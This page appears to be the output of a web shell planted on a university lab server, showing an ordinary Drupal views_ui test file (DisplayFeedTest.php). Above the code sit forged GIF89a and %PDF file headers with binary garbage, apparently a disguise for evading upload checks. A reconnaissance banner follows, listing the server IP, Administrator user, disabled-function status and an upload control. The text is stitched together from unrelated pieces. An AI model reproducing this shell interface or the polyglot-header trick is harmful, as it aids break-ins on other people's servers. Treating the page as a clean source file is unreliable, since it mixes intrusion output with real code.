GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.119 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/views_ui/src/Tests/ |
Upload File : |
<?php namespace Drupal\views_ui\Tests; /** * Tests the UI for feed display plugin. * * @group views_ui * @see \Drupal\views\Plugin\views\display\Feed */ class DisplayFeedTest extends UITestBase { /** * Views used by this test. * * @var array */ public static $testViews = ['test_display_feed', 'test_style_opml']; /** * Modules to enable. * * @var array */ public static $modules = ['views_ui', 'aggregator']; /** * Tests feed display admin UI. */ public function testFeedUI() { // Test both RSS and OPML feeds. foreach (self::$testViews as $view_name) { $this->checkFeedViewUi($view_name); } } /** * Checks views UI for a specific feed view. * * @param string $view_name * The view name to check against. */ protected function checkFeedViewUi($view_name) { $this->drupalGet('admin/structure/views'); // Verify that the page lists the $view_name view. // Regression test: ViewListBuilder::getDisplayPaths() did not properly // check whether a DisplayPluginCollection was returned in iterating over // all displays. $this->assertText($view_name); // Check the attach TO interface. $this->drupalGet('admin/structure/views/nojs/display/' . $view_name . '/feed_1/displays'); // Display labels should be escaped. $this->assertEscaped('<em>Page</em>'); // Load all the options of the checkbox. $result = $this->xpath('//div[@id="edit-displays"]/div'); $options = []; foreach ($result as $item) { foreach ($item->input->attributes() as $attribute => $value) { if ($attribute == 'value') { $options[] = (string) $value; } } } $this->assertEqual($options, ['default', 'page'], 'Make sure all displays appears as expected.'); // Post and save this and check the output. $this->drupalPostForm('admin/structure/views/nojs/display/' . $view_name . '/feed_1/displays', ['displays[page]' => 'page'], t('Apply')); // Options summary should be escaped. $this->assertEscaped('<em>Page</em>'); $this->assertNoRaw('<em>Page</em>'); $this->drupalGet('admin/structure/views/view/' . $view_name . '/edit/feed_1'); $this->assertFieldByXpath('//*[@id="views-feed-1-displays"]', '<em>Page</em>'); // Add the default display, so there should now be multiple displays. $this->drupalPostForm('admin/structure/views/nojs/display/' . $view_name . '/feed_1/displays', ['displays[default]' => 'default'], t('Apply')); $this->drupalGet('admin/structure/views/view/' . $view_name . '/edit/feed_1'); $this->assertFieldByXpath('//*[@id="views-feed-1-displays"]', 'Multiple displays'); } }